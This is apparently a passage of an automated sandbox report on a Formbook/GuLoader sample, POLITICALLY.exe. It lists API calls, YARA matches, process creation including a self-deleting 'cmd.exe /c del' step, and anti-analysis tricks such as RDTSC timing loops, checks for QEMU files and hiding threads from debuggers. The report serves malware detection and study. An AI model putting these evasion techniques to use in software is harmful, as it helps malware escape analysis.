        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2796D0 NtCreateKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E27A710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279760 NtOpenProcess,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E27A770 NtOpenThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E27AD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279560 NtWriteFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2795F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279A10 NtQuerySection,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E27A3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E27B040 NtSuspendThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2798A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E279950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E2799D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048695D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048696D0 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869650 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048699A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048695F0 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869520 NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_0486AD30 NtSetContextThread,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869560 NtWriteFile,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869610 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869670 NtQueryInformationProcess,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048697A0 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_0486A710 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869730 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869760 NtOpenProcess,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_0486A770 NtOpenThread,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869770 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048698A0 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048698F0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869820 NtEnumerateKey,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_0486B040 NtSuspendThread,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_048699D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869950 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869A80 NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869A00 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869A10 NtQuerySection,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869A20 NtResumeThread,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_0486A3B0 NtGetContextThread,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_04869B00 NtSetValueKey,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B83A0 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B8270 NtReadFile,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B82F0 NtClose,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B81C0 NtCreateFile,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B839A NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B826A NtReadFile,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B82EA NtClose,
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B81BA NtCreateFile,
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: String function: 1E23B150 appears 45 times
        Source: C:\Windows\SysWOW64\control.exe, Code function: String function: 0482B150 appears 35 times
        Source: POLITICALLY.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: POLITICALLY.exe, 00000002.00000002.415420522.0000000002200000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs POLITICALLY.exe
        Source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs POLITICALLY.exe
        Source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameCONTROL.EXEj% vs POLITICALLY.exe
        Source: POLITICALLY.exe, 0000000A.00000002.548056458.0000000002420000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemswsock.dll.muij% vs POLITICALLY.exe
        Source: POLITICALLY.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engine, Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
        Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
        Source: POLITICALLY.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: POLITICALLY.exe, Virustotal: Detection: 17%
        Source: POLITICALLY.exe, ReversingLabs: Detection: 17%
        Source: unknown, Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\SysWOW64\control.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\SysWOW64\control.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
        Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
        Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
        Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

        Data Obfuscation:

        Yara detected GuLoader
        Source: Yara match, File source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_00416E20 push ebx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_00403225 pushfd ; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DC36 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221E245 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221E378 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221E736 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DB19 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_02221E17 push ds; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DFD8 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_0221DD81 push ecx; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 2_2_02221DD8 push ds; iretd
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Code function: 10_2_1E28D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_0487D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030BB3B5 push eax; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030B8F44 push es; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030BB40B push eax; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030BB402 push eax; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030BB46C push eax; ret
        Source: C:\Windows\SysWOW64\control.exe, Code function: 23_2_030AB48A push edx; ret
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\POLITICALLY.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Detected RDTSC dummy instruction sequence (likely for instruction hammering)
        Source: C:\Users\user\Desktop\POLITICALLY.exe, RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions:
            0x00000000 rdtsc
            0x00000002 mov eax, 00000001h
            0x00000007 cpuid
            0x00000009 popad
            0x0000000a xor edi, edi
            0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h
            0x00000016 jmp 00007FDAB4B9AB29h
            0x0000001b test ecx, 375658D5h
            0x00000021 call 00007FDAB4B9AC71h
            0x00000026 call 00007FDAB4B9AA18h
            0x0000002b lfence
            0x0000002e mov edx, dword ptr [7FFE0014h]
            0x00000034 lfence
            0x00000037 ret
            0x00000038 mov esi, edx
            0x0000003a pushad
            0x0000003b rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exe, RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions:
            0x00000000 rdtsc
            0x00000002 xor eax, eax
            0x00000004 inc eax
            0x00000005 cpuid
            0x00000007 popad
            0x00000008 call 00007FDAB47B2AF8h
            0x0000000d lfence
            0x00000010 mov edx, dword ptr [7FFE0014h]
            0x00000016 lfence
            0x00000019 ret
            0x0000001a sub edx, esi
            0x0000001c ret
            0x0000001d add edi, edx
            0x0000001f jmp 00007FDAB47B2C0Dh
            0x00000024 cmp eax, eax
            0x00000026 dec dword ptr [ebp+000000F8h]
            0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h
            0x00000033 jne 00007FDAB47B29BDh
            0x00000039 call 00007FDAB47B2D61h
            0x0000003e call 00007FDAB47B2B08h
            0x00000043 lfence
            0x00000046 mov edx, dword ptr [7FFE0014h]
            0x0000004c lfence
            0x0000004f ret
            0x00000050 mov esi, edx
            0x00000052 pushad
            0x00000053 rdtsc
        Tries to detect Any.run
        Source: C:\Users\user\Desktop\POLITICALLY.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\POLITICALLY.exe, File opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\POLITICALLY.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\POLITICALLY.exe, File opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp, Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000002228D31 second address: 0000000002228D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB4B9D341h 0x0000001d popad 0x0000001e call 00007FDAB4B9B24Bh 0x00000023 lfence 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 0000000000578D31 second address: 0000000000578D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB47B5431h 0x0000001d popad 0x0000001e call 00007FDAB47B333Bh 0x00000023 lfence 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02213269 rdtsc
        Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
        Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
        Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: POLITICALLY.exe, 0000000A.00000003.497685279.00000000008D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
        Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
        Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess information queried: ProcessInformation

        Anti Debugging:

        Hides threads from debuggers
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\POLITICALLY.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\POLITICALLY.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02213269 rdtsc
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02221066 LdrInitializeThunk,
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02219212 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222C0B8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02219102 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222C1F4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222767D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_022197E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_022197DF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222440F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222C444 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02217A2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_02219917 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0222BFB8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 2_2_0221CD2F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E268E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
